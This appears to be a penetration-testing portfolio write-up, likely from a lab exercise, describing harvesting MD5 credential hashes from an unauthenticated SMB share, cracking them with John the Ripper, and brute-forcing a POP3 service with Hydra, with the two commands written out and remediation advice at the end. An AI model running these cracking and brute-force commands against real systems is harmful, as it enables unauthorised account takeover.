Objective: To exfiltrate and crack leaked credentials from unencrypted data sources to perform authenticated service attacks.

1. The Vulnerability: Information Disclosure (Credential Leak)

The target was found to have a critical information disclosure vulnerability where internal communication logs (emails) were accessible via unauthenticated network shares. These logs contained a dump of MD5-hashed credentials. This represents a fatal breakdown of Confidentiality, as any network participant could harvest the identity store without direct exploitation of a service flaw.

2. Technical Execution: Brute Force & Cryptanalysis

I utilized John the Ripper (JtR) to perform an offline dictionary attack against the exfiltrated MD5 hashes. Once recovered, these plaintext credentials were used as the primary authentication vector for secondary services (POP3/IMAP), demonstrating the cascading impact of a single data leak on organizational security.

ComponentValuePurpose
Data SourceSMB Share (Unauthenticated)The source of the leaked credential dump.
Hash TypeMD5The insecure algorithm used for initial password storage.
Cracking ToolJohn the RipperUsed for offline password recovery.
Attack PivotHydra (POP3 Brute Force)Utilizing recovered passwords for service access.

3. Execution Workflow

  1. Information Gathering: Scanned for Samba shares using Nmap and exfiltrated email logs from the public directory.
  2. Credential Extraction: Cleaned the exfiltrated data to isolate user-hash pairs for systematic cracking.
  3. Cryptanalysis: Used John the Ripper to successfully recover plaintext passwords from the MD5 hashes.
  4. Service Hijacking: Utilized the recovered credentials in conjunction with Hydra to gain administrative access to the target’s email infrastructure (POP3).

4. Key Commands

# Using John the Ripper to crack the exfiltrated MD5 hashes
john --format=Raw-MD5 --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt

# Using Hydra to verify recovered credentials against the POP3 service
hydra -L users.txt -P cracked_passes.txt 10.10.x.x pop3

5. Evidence of Work

RESOURCES_NODE_01
Discovery
Caption: Discovery phase showing the unauthenticated access to sensitive internal email logs.

RESOURCES_NODE_01
Results
Caption: Results/Impact phase showing the successful recovery of multiple plaintext passwords via John the Ripper.

6. Professional Impact

This project demonstrates the “Identity Lifecycle” of an attack. I proved that a simple configuration error (open SMB share) leads directly to a total account takeover across separate services (email). To remediate this, I recommended that the organization decommission unencrypted shares and transition to bcrypt or Argon2 for password hashing, ensuring that even if data is leaked, it cannot be readily decrypted by an adversary.